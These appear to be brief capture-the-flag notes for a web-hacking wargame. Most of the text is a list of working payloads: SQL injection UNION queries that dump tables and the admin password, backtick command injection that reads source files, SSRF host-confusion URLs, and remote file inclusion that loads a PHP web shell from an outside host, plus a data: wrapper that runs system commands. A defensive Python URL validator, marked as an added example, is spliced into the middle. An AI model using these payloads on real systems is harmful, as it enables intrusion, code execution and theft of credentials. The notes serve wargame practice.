https://bob.rubiya.kr/chall.php
order by 3
There are 3 columns
0 union select 1,2,3
0 union select 1,2,version()
information schema
0 union select 1,2, info from information_schema.processlist
table=> 0 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema=database()
0 union select 1,2, group_concat(column_name) from information_schema.columns where table_name='user'
0 union select id, pw, 1 from user where id='admin'
system("host {input}")
`head -2 index.php`
`grep FLAG index.php`
gitdumper
git log -p
ssrf=>pastebin
?http://a@pastebin.com:80@rubiya.kr/raw/~~~
http://asdf.kr#@rubiya.kr
ssrf bible
A new era of SSRF
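The two URLs above work only when the code that validates a URL and the client that fetches it disagree about which part is the host. As an added example (not part of the original notes), a fetch-side check in Python that refuses userinfo, matches the parsed host against an allowlist, and hands the HTTP client a rebuilt URL. The rubiya.kr allowlist, the port set and the function names are assumptions made for the example.

```python
from urllib.parse import urlsplit, urlunsplit

# Assumptions for this example: the fetcher may only reach rubiya.kr on default web ports.
ALLOWED_HOSTS = {"rubiya.kr"}
ALLOWED_PORTS = {None, 80, 443}


def canonical_fetch_url(raw: str) -> str:
    """Validate raw and return a rebuilt URL for the HTTP client; raise ValueError otherwise."""
    # Backslashes, whitespace and control characters are read differently by different parsers.
    if any(c == "\\" or c.isspace() or ord(c) < 0x20 for c in raw):
        raise ValueError("ambiguous character")
    parts = urlsplit(raw)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    # Any '@' in the authority is userinfo. Parsers disagree on which '@' ends it,
    # so the validator and the HTTP client can resolve different hosts.
    if "@" in parts.netloc:
        raise ValueError("userinfo not allowed")
    try:
        port = parts.port
    except ValueError:
        raise ValueError("invalid port") from None
    host = (parts.hostname or "").rstrip(".")
    if host not in ALLOWED_HOSTS:
        raise ValueError("host not allowed")
    if port not in ALLOWED_PORTS:
        raise ValueError("port not allowed")
    # Rebuild from the validated components and drop the fragment, so the client
    # never re-parses the caller's original string.
    netloc = host if port is None else f"{host}:{port}"
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


def verdict(raw: str) -> str:
    try:
        return "fetch " + canonical_fetch_url(raw)
    except ValueError as exc:
        return f"reject ({exc})"


if __name__ == "__main__":
    for url in (
        "http://a@pastebin.com:80@rubiya.kr/raw/~~~",  # from the notes
        "http://asdf.kr#@rubiya.kr",                    # from the notes
        "http://rubiya.kr/raw/abc",                     # constructed benign input
    ):
        print(f"{url!r:50} -> {verdict(url)}")
```

A string-level allowlist does not cover redirects or DNS answers that point at internal addresses; those need a check at connection time.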
Put the XXE in data
EXIF tampering tool???
file inclusion no. 3
Files can be included from an external source
<?php
system($_GET['c']);
?>
http://a.rubiya.kr
/payload
?page=data:text/plain,<?php%20system(id)?>;
smarty